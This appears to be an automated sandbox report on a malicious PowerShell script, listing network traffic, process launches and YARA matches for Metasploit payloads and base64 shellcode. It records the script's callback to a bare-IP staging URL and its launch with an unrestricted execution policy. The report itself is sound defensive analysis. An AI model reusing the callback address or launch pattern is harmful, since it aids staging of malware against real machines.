          Source: global trafficHTTP traffic detected: GET /x1Fm HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)Host: 206.189.69.35Connection: Keep-AliveCache-Control: no-cache
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 09:59:26 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 275Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 30 36 2e 31 38 39 2e 36 39 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 206.189.69.35 Port 80</address></body></html>
          Source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmpString found in binary or memory: http://206.189.69.35/x1Fm
          Source: powershell.exe, 00000000.00000002.772023665.000001CDB7E38000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: WerFault.exe, 0000000D.00000002.762935904.0000000004CE4000.00000004.00000001.sdmpString found in binary or memory: http://crl.m
          Source: powershell.exe, 00000000.00000002.772612102.000001CDB8137000.00000004.00000001.sdmpString found in binary or memory: http://crl.osofts/Microt0
          Source: WerFault.exe, 0000000D.00000003.730419455.0000000005770000.00000004.00000001.sdmpString found in binary or memory: http://localhost/wsman:Microsoft.PowerShell.Workflow
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: powershell.exe, 00000000.00000002.754811598.000001CD9FC11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000000.710315225.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
          Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.767490494.000001CDA1709000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C026AD0_2_00007FFA35C026AD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C009BD0_2_00007FFA35C009BD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C0157F0_2_00007FFA35C0157F
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFA35C01D700_2_00007FFA35C01D70
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: a.ps1, type: SAMPLEMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORYMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPEDMatched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
          Source: classification engineClassification label: mal96.troj.evad.winPS1@9/14@0/2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210706Jump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_01
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5964
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_odvubcus.q0n.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations and search. Tags = @('powershell','unit testing','bdd','tdd','mocking') # The web address of an icon which can be used in galleries to represen
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: a.ps1Virustotal: Detection: 50%
          Source: a.ps1ReversingLabs: Detection: 55%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\a.ps1'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfile
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'c:\windows\syswow64\windowspowershell\v1.0\powershell.exe' -Version 5.1 -s -NoLogo -NoProfileJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: Binary string: System.Configuration.Install.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: System.Data.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: umerics.pdb" source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Numerics.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbTR source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb! source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: .textn.pdb ` source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
          Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
          Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
